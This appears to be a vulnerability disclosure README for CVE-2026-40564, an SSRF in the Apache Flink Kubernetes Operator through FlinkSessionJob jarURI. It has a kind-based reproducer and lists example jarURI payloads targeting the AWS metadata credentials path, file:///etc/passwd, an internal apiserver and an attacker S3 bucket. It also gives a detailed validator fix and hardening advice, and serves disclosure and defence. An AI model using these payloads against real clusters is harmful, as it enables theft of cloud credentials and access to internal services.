oscerd/CVE-2026-40564
# CVE-2026-40564: SSRF via FlinkSessionJob.spec.job.jarURI in flink-kubernetes-operator
The Apache Flink Kubernetes Operator does not check the `spec.job.jarURI` field on `FlinkSessionJob` (or `FlinkDeployment`) resources. Anyone who can create one of those resources can set `jarURI` to any URL. When the operator reconciles the resource, it fetches that URL from inside its own pod. The scheme can be `http`, `https`, `file`, or any scheme handled by the filesystem plugins Flink ships with, so the request can go almost anywhere the operator pod can reach.
* CVE: CVE-2026-40564
* Affected: flink-kubernetes-operator 1.14.0, and `main` (1.15-SNAPSHOT as of 2026-04-09)
* Reported to `security@apache.org` and `private@flink.apache.org` on 2026-04-09
* Call chain: `SessionJobReconciler.deploy` -> `submitJobToSessionCluster` -> `uploadJar` -> `ArtifactManager.fetch` -> `HttpArtifactFetcher.fetch`
## Running it
```sh
make verify
```
This runs five steps in order:
1. create a local kind cluster
2. install the operator (1.14.0) with Helm
3. start a Flink session cluster and wait for its JobManager to come up
4. ask webhook.site for a fresh URL, then apply a `FlinkSessionJob` whose `jarURI` points at it
5. poll webhook.site and print the requests it received
When it works, the end of the run looks like this:
```text
==> [5/5] verify-ssrf
target jarURI: https://webhook.site//exploit.jar
target is webhook.site, confirming via its REST API...
=== webhook.site captured requests (newest first) ===
2026-05-28 17:35:29 GET https://webhook.site//exploit.jar
User-Agent: Java/17.0.17
Source IP: 82.51.158.62
CVE-2026-40564 CONFIRMED: the operator pod issued an HTTP GET against the attacker URL.
Dashboard: https://webhook.site/#!/view/
```
The first run takes about 6 to 8 minutes. Most of that is pulling the `flink:1.17` image, which is around 700 MB. Later runs are closer to 3 minutes.
### What you need
`docker`, `kind`, `kubectl` 1.23 or newer, `helm` 3, `make`, `curl`, and `jq`. The cluster has to reach the internet so it can talk to webhook.site.
### Pointing it at a different URL
By default the Makefile grabs a fresh webhook.site URL for you. To send the request somewhere else, set `SSRF_URL` to the full `jarURI` you want. It is used as written.
```sh
# reuse a specific webhook.site URL
make verify SSRF_URL=https://webhook.site/8a2f1e3c-aaaa-bbbb-cccc-dddddddddddd/exploit.jar
# your own collaborator (Burp, interactsh, a netcat listener, and so on)
make verify SSRF_URL=https://abc123.oast.fun/exploit.jar
# the AWS instance metadata service
make verify SSRF_URL=http://169.254.169.254/latest/meta-data/iam/security-credentials/
# a non-http scheme handled by Flink's filesystem layer
make verify SSRF_URL=file:///etc/passwd
```
### Cleaning up
```sh
make cleanup
```
This removes the kind cluster. Nothing is left behind.
## Why it happens
Three classes are involved, and none of them looks at the scheme, host, or IP in `jarURI`. `DefaultValidator.validateJobSpec` checks the rest of the job spec but never inspects the URI:
```java
// DefaultValidator (abridged)
private Optional<String> validateJobSpec(
        JobSpec job, @Nullable TaskManagerSpec tm, Map<String, String> confMap) {
    if (job == null) return Optional.empty();
    Configuration configuration = Configuration.fromMap(confMap);
    // ... parallelism / upgradeMode / savepoint / resource checks ...
    // job.getJarURI() is never inspected.
    return Optional.empty();
}
```
`ArtifactManager.fetch` picks a fetcher from the scheme. There is no allowlist, and anything that is not http or https drops through to Flink's filesystem layer:
```java
// ArtifactManager (abridged)
public File fetch(String jarURI, Configuration flinkConfiguration, String targetDirStr) throws Exception {
    File targetDir = new File(targetDirStr);
    URI uri = new URI(jarURI);
    // Anything that is not exactly "http" or "https" goes to the filesystem fetcher.
    if ("http".equals(uri.getScheme()) || "https".equals(uri.getScheme())) {
        return HttpArtifactFetcher.INSTANCE.fetch(jarURI, flinkConfiguration, targetDir);
    } else {
        return FileSystemBasedArtifactFetcher.INSTANCE.fetch(jarURI, flinkConfiguration, targetDir);
    }
}
```
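The dispatch can be replayed on its own to see which fetcher a given `jarURI` would reach. This sketch copies the comparison from `ArtifactManager.fetch` and fetches nothing; `FetchBranch` and `branchFor` are hypothetical names. It also surfaces a detail that matters for any fix: `java.net.URI` keeps the scheme exactly as written, so `HTTPS://...` fails the exact match and falls through to the filesystem branch, as does a path with no scheme at all.

```java
import java.net.URI;

/** Hypothetical replay of the branch selection in ArtifactManager.fetch. Nothing is fetched. */
public class FetchBranch {

    static String branchFor(String jarURI) {
        // URI.create throws IllegalArgumentException for malformed input.
        String scheme = URI.create(jarURI).getScheme();
        // Same exact, case-sensitive comparison as the quoted code.
        if ("http".equals(scheme) || "https".equals(scheme)) {
            return "HttpArtifactFetcher";
        }
        // Everything else, including a null scheme, falls through.
        return "FileSystemBasedArtifactFetcher";
    }

    public static void main(String[] args) {
        String[] samples = {
            "https://example.com/job.jar",
            "http://169.254.169.254/latest/meta-data/",
            "file:///etc/passwd",
            "s3://bucket/x.jar",
            "HTTPS://example.com/job.jar",
            "/opt/flink/job.jar"
        };
        for (String s : samples) {
            System.out.println(s + " -> " + branchFor(s));
        }
    }
}
```

Because the scheme's case survives parsing, a scheme allowlist has to normalize case before comparing, otherwise an uppercase variant slips past it.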
`HttpArtifactFetcher.fetch` opens the URL as given. There is no host check, no IP range check, and nothing that stops it from hitting loopback or link-local addresses:
```java
// HttpArtifactFetcher
public File fetch(String uri, Configuration flinkConfiguration, File targetDir) throws Exception {
    URL url = new URL(uri); // no host or address check before connecting
    HttpURLConnection conn = (HttpURLConnection) url.openConnection();
    conn.setRequestMethod("GET");
    File targetFile = new File(targetDir, FilenameUtils.getName(url.getPath()));
    try (var inputStream = conn.getInputStream()) { // the GET is sent here
        FileUtils.copyToFile(inputStream, targetFile);
    }
    return targetFile;
}
```
## What an attacker gets
The operator usually runs with wide RBAC. The official Helm chart grants `*` on several resource types, secrets included, and the pod can normally reach the network without restriction. If you can make it send requests for you, you can:
* read cloud metadata services (AWS, GCE, Azure) and pull the IAM credentials tied to the operator's node
* reach services inside the cluster that only listen on the internal network, or that trust the operator's source IP
* probe internal hosts and ports, inferring whether each is open from the error the operator records in the `FlinkSessionJob` status
* use file, s3, hdfs, gs, or any other Flink filesystem scheme to read local files or talk to storage the operator can reach but you cannot
On a shared cluster where several teams use the same operator, any of them can use it to reach another team's resources.
### Other URLs that work
The reproducer defaults to webhook.site, but the bug does not care what the URL is. Set `SSRF_URL`, or edit `manifests/vulnerable-sessionjob.yaml`, to any of these:
| `jarURI` | Reaches |
|---|---|
| `http://169.254.169.254/latest/meta-data/iam/security-credentials/` | AWS IMDSv1, the IAM credentials of the operator pod's node |
| `http://10.0.0.1:6443/api` | An in-cluster apiserver, or any internal endpoint that allowlists the operator's IP |
| `file:///etc/passwd` | The operator pod's own filesystem, through the filesystem fetcher branch |
| `s3://attacker-bucket/x.jar` | S3, using the operator pod's credentials |
## Fixing it
Add a check to `DefaultValidator.validateJobSpec`:
```java
// In DefaultValidator.validateJobSpec, alongside the existing checks:
if (job.getJarURI() != null) {
    Optional<String> uriError = validateJarURI(job.getJarURI(), configuration);
    if (uriError.isPresent()) return uriError;
}
```
```java
// Needs java.net.{InetAddress, URI, URISyntaxException, UnknownHostException}
// and java.util.{HashSet, Locale, Optional, Set}.
private Optional<String> validateJarURI(String jarURI, Configuration conf) {
    URI uri;
    try {
        uri = new URI(jarURI);
    } catch (URISyntaxException e) {
        return Optional.of("jarURI is not a valid URI: " + e.getMessage());
    }
    String scheme = uri.getScheme();
    if (scheme == null) return Optional.of("jarURI must include a scheme");
    // URI keeps the scheme's original case, so normalize before the lookup.
    Set<String> allowed = new HashSet<>(conf.get(KubernetesOperatorConfigOptions.JAR_URI_ALLOWED_SCHEMES));
    if (!allowed.contains(scheme.toLowerCase(Locale.ROOT))) {
        return Optional.of("jarURI scheme '" + scheme + "' is not in the allowlist");
    }
    if ("http".equalsIgnoreCase(scheme) || "https".equalsIgnoreCase(scheme)) {
        String host = uri.getHost();
        if (host == null) return Optional.of("jarURI must include a host");
        InetAddress[] addrs;
        try {
            // A name can resolve to several addresses; reject if any of them is restricted.
            addrs = InetAddress.getAllByName(host);
        } catch (UnknownHostException e) {
            return Optional.of("jarURI host cannot be resolved");
        }
        for (InetAddress addr : addrs) {
            if (addr.isLoopbackAddress() || addr.isLinkLocalAddress()
                    || addr.isSiteLocalAddress() || addr.isAnyLocalAddress()) {
                return Optional.of("jarURI host points to a restricted address");
            }
        }
    }
    return Optional.empty();
}
```
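Give `KubernetesOperatorConfigOptions.JAR_URI_ALLOWED_SCHEMES` a default of only `https`. Flink's `ConfigOptions` builder produces list-typed rather than set-typed options, so something like `.stringType().asList().defaultValues("https")` fits. Operators who need s3 or another scheme can add it. Read the allowlist from the operator's own configuration, not from anything the resource can set: if the `confMap` passed to `validateJobSpec` includes the resource's own `flinkConfiguration`, the submitter can widen the allowlist themselves.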
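The four `InetAddress` predicates used in `validateJarURI` leave gaps. `isSiteLocalAddress` recognizes the IPv4 private ranges and the deprecated IPv6 `fec0::/10` block, but not IPv6 unique local addresses (`fc00::/7`), which include AWS's IPv6 metadata endpoint `fd00:ec2::254`. Carrier-grade NAT space (`100.64.0.0/10`) and `0.0.0.0/8` also pass. The sketch below is one possible extension, assuming a byte-level range check is acceptable in the validator; `RestrictedAddress` and its methods are hypothetical names, and the range list is a starting point, not a complete blocklist.

```java
import java.net.Inet4Address;
import java.net.Inet6Address;
import java.net.InetAddress;
import java.net.UnknownHostException;

/** Hypothetical helper: the validator's predicates plus a few ranges they miss. */
public class RestrictedAddress {

    /** The four JDK predicates used in the proposed validateJarURI. */
    static boolean jdkRestricted(InetAddress a) {
        return a.isLoopbackAddress() || a.isLinkLocalAddress()
                || a.isSiteLocalAddress() || a.isAnyLocalAddress();
    }

    /** jdkRestricted plus ranges those predicates do not cover. */
    static boolean isRestricted(InetAddress a) {
        if (jdkRestricted(a)) return true;
        byte[] b = a.getAddress();
        if (a instanceof Inet4Address) {
            int first = b[0] & 0xff;
            int second = b[1] & 0xff;
            // 0.0.0.0/8 ("this network") and 100.64.0.0/10 (carrier-grade NAT).
            return first == 0 || (first == 100 && second >= 64 && second <= 127);
        }
        if (a instanceof Inet6Address) {
            // fc00::/7 unique local addresses, e.g. fd00:ec2::254.
            return (b[0] & 0xfe) == 0xfc;
        }
        return false;
    }

    /** Intended for IP literals, which InetAddress parses without a DNS lookup. */
    static InetAddress parse(String literal) {
        try {
            return InetAddress.getByName(literal);
        } catch (UnknownHostException e) {
            throw new IllegalArgumentException(literal, e);
        }
    }

    public static void main(String[] args) {
        String[] literals = {
            "169.254.169.254", "10.0.0.1", "100.64.0.1", "fd00:ec2::254", "::ffff:127.0.0.1", "8.8.8.8"
        };
        for (String s : literals) {
            InetAddress a = parse(s);
            System.out.printf("%-18s jdk=%-5b extended=%b%n", s, jdkRestricted(a), isRestricted(a));
        }
    }
}
```

Java converts IPv4-mapped IPv6 literals such as `::ffff:127.0.0.1` to plain IPv4 addresses, so the loopback predicate still catches that form.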
Two more things worth doing:
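* Add a `NetworkPolicy` for the operator pod that denies egress to link-local space (`169.254.0.0/16`, which covers the `169.254.169.254` metadata endpoint used by AWS, GCE, and Azure) and to any other metadata address your provider uses. A `NetworkPolicy` cannot block loopback traffic or `file:` reads inside the pod, and the operator still needs to reach the API server and the JobManagers, so this backs up the validator rather than replacing it.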
* On AWS, require IMDSv2 (set `HttpTokens` to `required`). IMDSv2 only issues a session token in response to a `PUT`, and the fetcher only sends `GET`, so even a working SSRF cannot read the metadata service.
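The validator also runs only once, when the resource is admitted, while `HttpArtifactFetcher` resolves the host again when it connects. A DNS name can return a public address to the validator and an internal one to the fetcher (DNS rebinding). Separately, `HttpURLConnection` follows redirects by default and the fetcher excerpt does not turn that off, so an allowed public `https` URL can answer with a redirect to an internal `https` endpoint (`HttpURLConnection` does not follow a redirect that switches between `http` and `https`). The sketch below is a hypothetical `GuardedHttpOpen` helper, not operator code: it repeats the address check right before opening the connection and disables redirects. It narrows the rebinding window without closing it, because `HttpURLConnection` still performs its own lookup; closing it fully means connecting to the exact address that was checked.

```java
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.InetAddress;
import java.net.URI;

/** Hypothetical fetch-time guard; not part of the operator. */
public class GuardedHttpOpen {

    // Same predicates as the validator; extend with any extra ranges you block.
    static boolean isRestricted(InetAddress a) {
        return a.isLoopbackAddress() || a.isLinkLocalAddress()
                || a.isSiteLocalAddress() || a.isAnyLocalAddress();
    }

    /**
     * Re-checks every address of the host right before opening the connection and
     * disables redirects. openConnection() sends nothing yet; the request goes out
     * when the caller reads the response.
     */
    static HttpURLConnection open(String jarURI) throws IOException {
        URI uri = URI.create(jarURI);
        String scheme = uri.getScheme();
        if (!"http".equalsIgnoreCase(scheme) && !"https".equalsIgnoreCase(scheme)) {
            throw new IOException("not an http(s) URI: " + jarURI);
        }
        String host = uri.getHost();
        if (host == null) throw new IOException("no host in " + jarURI);
        for (InetAddress a : InetAddress.getAllByName(host)) {
            if (isRestricted(a)) {
                throw new IOException("restricted address " + a.getHostAddress());
            }
        }
        HttpURLConnection conn = (HttpURLConnection) uri.toURL().openConnection();
        conn.setInstanceFollowRedirects(false);
        conn.setRequestMethod("GET");
        return conn;
    }

    /** With redirects off, a 3xx reaches the caller, which should treat it as a failure. */
    static boolean isRedirect(int status) {
        return status >= 300 && status < 400;
    }

    public static void main(String[] args) {
        try {
            open("http://127.0.0.1:8080/x.jar");
        } catch (IOException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

A caller would read `conn.getResponseCode()` and stop if `isRedirect` returns true, before calling `getInputStream()`.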
## Notes
The Makefile works around two things that break kind on Linux. Each check only runs when the problem is actually present, so it is safe to run again.
1. CoreDNS forwarding to loopback. With systemd-resolved, the kind node's `/etc/resolv.conf` points at `127.0.0.1`, so the cluster resolves outside names to localhost. The `cluster-up` step rewrites the CoreDNS config to forward to `1.1.1.1` and `8.8.8.8`.
2. The operator pod inheriting the host's DNS search domains. With `ndots` set to 5, a name like `webhook.site` gets the host search domains added first, and some ISPs answer `127.0.0.1` for subdomains they do not recognize. The `install-operator` step gives the operator pod its own `dnsConfig` so this does not happen.
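The search-list rule behind the second workaround can be modeled in a few lines. This sketch follows glibc-style `resolv.conf` behavior: a name with fewer than `ndots` dots is tried with each search domain appended before it is tried as written, and a trailing dot skips the search list. The resolver stops at the first candidate that gets a positive answer, so a search domain whose DNS server answers `127.0.0.1` for unknown names wins before `webhook.site` itself is ever queried. `NdotsExpansion` is a hypothetical name, `default.svc.cluster.local` assumes the pod runs in namespace `default`, `home.lan` stands in for a host search domain, and other resolver implementations differ in details.

```java
import java.util.ArrayList;
import java.util.List;

/** Hypothetical model of glibc-style resolv.conf search-list expansion. */
public class NdotsExpansion {

    /** Names in the order the stub resolver would query them. */
    static List<String> candidates(String name, List<String> searchDomains, int ndots) {
        List<String> out = new ArrayList<>();
        if (name.endsWith(".")) {
            out.add(name); // already absolute: the search list is skipped
            return out;
        }
        long dots = name.chars().filter(c -> c == '.').count();
        if (dots >= ndots) out.add(name); // enough dots: try the name as written first
        for (String domain : searchDomains) {
            out.add(name + "." + domain);
        }
        if (dots < ndots) out.add(name); // too few dots: as written only after the search list
        return out;
    }

    public static void main(String[] args) {
        List<String> search = List.of(
                "default.svc.cluster.local", "svc.cluster.local", "cluster.local", "home.lan");
        candidates("webhook.site", search, 5).forEach(System.out::println);
    }
}
```

Writing the name with a trailing dot or lowering `ndots` in the pod's `dnsConfig` are the usual ways to avoid the expansion.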